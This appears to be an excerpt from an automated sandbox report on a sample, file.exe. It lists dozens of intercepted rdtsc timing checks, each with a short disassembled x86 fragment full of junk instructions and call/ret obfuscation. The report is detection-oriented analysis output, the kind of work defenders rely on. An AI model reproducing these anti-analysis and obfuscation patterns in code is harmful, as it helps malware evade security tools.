Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 58A1F5 second address: 58A207 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 mov eax, dword ptr [esp+04h] 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c jl 00007F96F934F1E6h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 58A207 second address: 58A25D instructions: 0x00000000 rdtsc 0x00000002 jl 00007F96F95D6D66h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007F96F95D6D77h 0x0000000f popad 0x00000010 mov eax, dword ptr [eax] 0x00000012 jmp 00007F96F95D6D76h 0x00000017 mov dword ptr [esp+04h], eax 0x0000001b pushad 0x0000001c jng 00007F96F95D6D73h 0x00000022 jmp 00007F96F95D6D6Dh 0x00000027 push eax 0x00000028 push edx 0x00000029 push eax 0x0000002a push edx 0x0000002b rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 58A25D second address: 58A261 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 58A387 second address: 58A3A0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F96F95D6D75h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 58A3A0 second address: 58A3B7 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F96F934F1E6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f jp 00007F96F934F1E8h 0x00000015 push esi 0x00000016 pop esi 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 58A3B7 second address: 58A3D8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F96F95D6D6Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esp+04h] 0x0000000d push edx 0x0000000e push edi 0x0000000f pushad 0x00000010 popad 0x00000011 pop edi 0x00000012 pop edx 0x00000013 mov eax, dword ptr [eax] 0x00000015 push ebx 0x00000016 pushad 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 58A3D8 second address: 58A3E8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop ebx 0x00000008 mov dword ptr [esp+04h], eax 0x0000000c push ecx 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 58A3E8 second address: 58A3EE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 58A3EE second address: 58A480 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop ecx 0x00000006 pop eax 0x00000007 mov dword ptr [ebp+122D23EFh], edx 0x0000000d push 00000003h 0x0000000f sub esi, dword ptr [ebp+122D38BEh] 0x00000015 push 00000000h 0x00000017 push 00000000h 0x00000019 push eax 0x0000001a call 00007F96F934F1E8h 0x0000001f pop eax 0x00000020 mov dword ptr [esp+04h], eax 0x00000024 add dword ptr [esp+04h], 00000019h 0x0000002c inc eax 0x0000002d push eax 0x0000002e ret 0x0000002f pop eax 0x00000030 ret 0x00000031 mov esi, dword ptr [ebp+122D39CEh] 0x00000037 push 00000003h 0x00000039 jng 00007F96F934F1ECh 0x0000003f sub esi, dword ptr [ebp+122D392Eh] 0x00000045 push A28ED3BFh 0x0000004a jmp 00007F96F934F1F6h 0x0000004f add dword ptr [esp], 1D712C41h 0x00000056 sub dword ptr [ebp+122D225Ch], esi 0x0000005c lea ebx, dword ptr [ebp+1245FFFCh] 0x00000062 or esi, 7F12A78Fh 0x00000068 xchg eax, ebx 0x00000069 jmp 00007F96F934F1EBh 0x0000006e push eax 0x0000006f push eax 0x00000070 push edx 0x00000071 pushad 0x00000072 push eax 0x00000073 push edx 0x00000074 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 58A480 second address: 58A486 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 58A486 second address: 58A48B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 58A5E2 second address: 58A5E6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 58A5E6 second address: 58A5EA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 58A6AD second address: 58A6B7 instructions: 0x00000000 rdtsc 0x00000002 je 00007F96F95D6D66h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 59C6B1 second address: 59C6E1 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F96F934F1E6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jnc 00007F96F934F1F0h 0x00000010 popad 0x00000011 push eax 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007F96F934F1F1h 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5A985C second address: 5A9860 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5A9860 second address: 5A9864 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5A9864 second address: 5A9870 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a push esi 0x0000000b pop esi 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5A9870 second address: 5A988A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F96F934F1F0h 0x00000007 jc 00007F96F934F1E6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5A988A second address: 5A9892 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5A99E7 second address: 5A99EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5A99EB second address: 5A99FA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F96F95D6D6Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5A99FA second address: 5A9A09 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop esi 0x00000005 pushad 0x00000006 popad 0x00000007 jbe 00007F96F934F1E6h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5A9B57 second address: 5A9B63 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F96F95D6D66h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5A9FD1 second address: 5A9FDB instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F96F934F1E6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5A9FDB second address: 5A9FEF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007F96F95D6D6Bh 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5A9FEF second address: 5A9FF5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5A9FF5 second address: 5AA00C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 jmp 00007F96F95D6D6Eh 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5AA00C second address: 5AA012 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5AA57A second address: 5AA599 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push ebx 0x00000006 pop ebx 0x00000007 jnl 00007F96F95D6D66h 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F96F95D6D6Dh 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5AA71E second address: 5AA74F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F96F934F1EEh 0x00000007 jmp 00007F96F934F1F1h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 jno 00007F96F934F1E6h 0x00000016 jp 00007F96F934F1E6h 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5AA74F second address: 5AA759 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F96F95D6D66h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5AA759 second address: 5AA763 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jne 00007F96F934F1E6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5AA9CA second address: 5AA9F3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 jmp 00007F96F95D6D6Fh 0x0000000b popad 0x0000000c jmp 00007F96F95D6D73h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5AB1B2 second address: 5AB1C9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F96F934F1F2h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5AB341 second address: 5AB345 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5AB345 second address: 5AB34B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5AB61A second address: 5AB61E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5AB61E second address: 5AB624 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5AB624 second address: 5AB638 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 je 00007F96F95D6D6Eh 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5AB638 second address: 5AB63D instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5AEC58 second address: 5AEC5E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5AEC5E second address: 5AEC88 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pushad 0x00000006 jmp 00007F96F934F1F9h 0x0000000b pushad 0x0000000c popad 0x0000000d jg 00007F96F934F1E6h 0x00000013 push edi 0x00000014 pop edi 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5AEC88 second address: 5AEC94 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnp 00007F96F95D6D66h 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5B4911 second address: 5B4916 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5B4A57 second address: 5B4A5D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5B4A5D second address: 5B4A61 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5B4A61 second address: 5B4A6F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c push esi 0x0000000d pop esi 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5B4A6F second address: 5B4A73 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5B4A73 second address: 5B4A7D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5B7664 second address: 5B766A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5B766A second address: 5B7675 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5B7675 second address: 5B767B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5B767B second address: 5B7680 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5B7680 second address: 5B76A3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jc 00007F96F934F1E6h 0x0000000a jmp 00007F96F934F1F9h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5B782C second address: 5B7832 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5B79B4 second address: 5B79BA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5B79BA second address: 5B79C4 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F96F95D6D66h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5B79C4 second address: 5B79D0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 jo 00007F96F934F1E6h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5B79D0 second address: 5B79D4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5B7AFA second address: 5B7B2D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F96F934F1F8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007F96F934F1F7h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5B7FAB second address: 5B7FB1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5B7FB1 second address: 5B7FBC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5B7FBC second address: 5B7FC2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5B8131 second address: 5B8139 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5B9F09 second address: 5B9F2F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F96F961C6ABh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F96F961C6B3h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5B9F2F second address: 5B9F4D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F96F8D16A27h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5B9F4D second address: 5B9F85 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F96F961C6A6h 0x0000000a popad 0x0000000b popad 0x0000000c mov eax, dword ptr [esp+04h] 0x00000010 push edx 0x00000011 jns 00007F96F961C6A8h 0x00000017 pop edx 0x00000018 mov eax, dword ptr [eax] 0x0000001a pushad 0x0000001b jmp 00007F96F961C6AAh 0x00000020 pushad 0x00000021 pushad 0x00000022 popad 0x00000023 pushad 0x00000024 popad 0x00000025 popad 0x00000026 popad 0x00000027 mov dword ptr [esp+04h], eax 0x0000002b push eax 0x0000002c push edx 0x0000002d push eax 0x0000002e push edx 0x0000002f pushad 0x00000030 popad 0x00000031 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5B9F85 second address: 5B9F8F instructions: 0x00000000 rdtsc 0x00000002 jo 00007F96F8D16A16h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5BAF3E second address: 5BAF44 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5BAF44 second address: 5BAF48 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5BBFA2 second address: 5BBFA7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5BBFA7 second address: 5BBFF6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F96F8D16A1Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c push 00000000h 0x0000000e push ecx 0x0000000f call 00007F96F8D16A18h 0x00000014 pop ecx 0x00000015 mov dword ptr [esp+04h], ecx 0x00000019 add dword ptr [esp+04h], 00000019h 0x00000021 inc ecx 0x00000022 push ecx 0x00000023 ret 0x00000024 pop ecx 0x00000025 ret 0x00000026 movzx esi, bx 0x00000029 push 00000000h 0x0000002b mov dword ptr [ebp+122D2922h], ecx 0x00000031 push 00000000h 0x00000033 xchg eax, ebx 0x00000034 push eax 0x00000035 push edx 0x00000036 jmp 00007F96F8D16A1Dh 0x0000003b rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5BCFFB second address: 5BD001 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5BD001 second address: 5BD06A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop esi 0x00000006 mov dword ptr [esp], eax 0x00000009 stc 0x0000000a push 00000000h 0x0000000c push 00000000h 0x0000000e push ebp 0x0000000f call 00007F96F8D16A18h 0x00000014 pop ebp 0x00000015 mov dword ptr [esp+04h], ebp 0x00000019 add dword ptr [esp+04h], 0000001Ch 0x00000021 inc ebp 0x00000022 push ebp 0x00000023 ret 0x00000024 pop ebp 0x00000025 ret 0x00000026 push ebx 0x00000027 mov dword ptr [ebp+122D25BEh], edx 0x0000002d pop edi 0x0000002e push 00000000h 0x00000030 push 00000000h 0x00000032 push ebp 0x00000033 call 00007F96F8D16A18h 0x00000038 pop ebp 0x00000039 mov dword ptr [esp+04h], ebp 0x0000003d add dword ptr [esp+04h], 00000014h 0x00000045 inc ebp 0x00000046 push ebp 0x00000047 ret 0x00000048 pop ebp 0x00000049 ret 0x0000004a cmc 0x0000004b xchg eax, ebx 0x0000004c pushad 0x0000004d jne 00007F96F8D16A18h 0x00000053 push eax 0x00000054 push edx 0x00000055 jns 00007F96F8D16A16h 0x0000005b rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5BD06A second address: 5BD076 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5BE57A second address: 5BE57E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5BF07A second address: 5BF07E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5BF07E second address: 5BF0C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov dword ptr [esp], eax 0x00000009 mov di, ax 0x0000000c push 00000000h 0x0000000e push 00000000h 0x00000010 push ebp 0x00000011 call 00007F96F8D16A18h 0x00000016 pop ebp 0x00000017 mov dword ptr [esp+04h], ebp 0x0000001b add dword ptr [esp+04h], 00000016h 0x00000023 inc ebp 0x00000024 push ebp 0x00000025 ret 0x00000026 pop ebp 0x00000027 ret 0x00000028 mov edi, dword ptr [ebp+12487323h] 0x0000002e push 00000000h 0x00000030 add si, 0DE6h 0x00000035 push eax 0x00000036 push eax 0x00000037 push edx 0x00000038 push eax 0x00000039 push edx 0x0000003a jl 00007F96F8D16A16h 0x00000040 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5BF0C2 second address: 5BF0DB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F96F961C6B5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5BFAFF second address: 5BFB05 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5C0578 second address: 5C0581 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push edi 0x00000008 pop edi 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5C2257 second address: 5C226C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F96F8D16A1Ah 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5C226C second address: 5C2270 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5C2270 second address: 5C2274 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5C2274 second address: 5C228E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F96F961C6B4h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5C228E second address: 5C22CE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F96F8D16A20h 0x00000007 jmp 00007F96F8D16A1Dh 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pushad 0x0000000f jc 00007F96F8D16A1Ah 0x00000015 jmp 00007F96F8D16A1Ch 0x0000001a push eax 0x0000001b push edx 0x0000001c jne 00007F96F8D16A16h 0x00000022 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5C22CE second address: 5C22D2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5689A0 second address: 5689A8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5689A8 second address: 5689AC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5689AC second address: 5689B0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
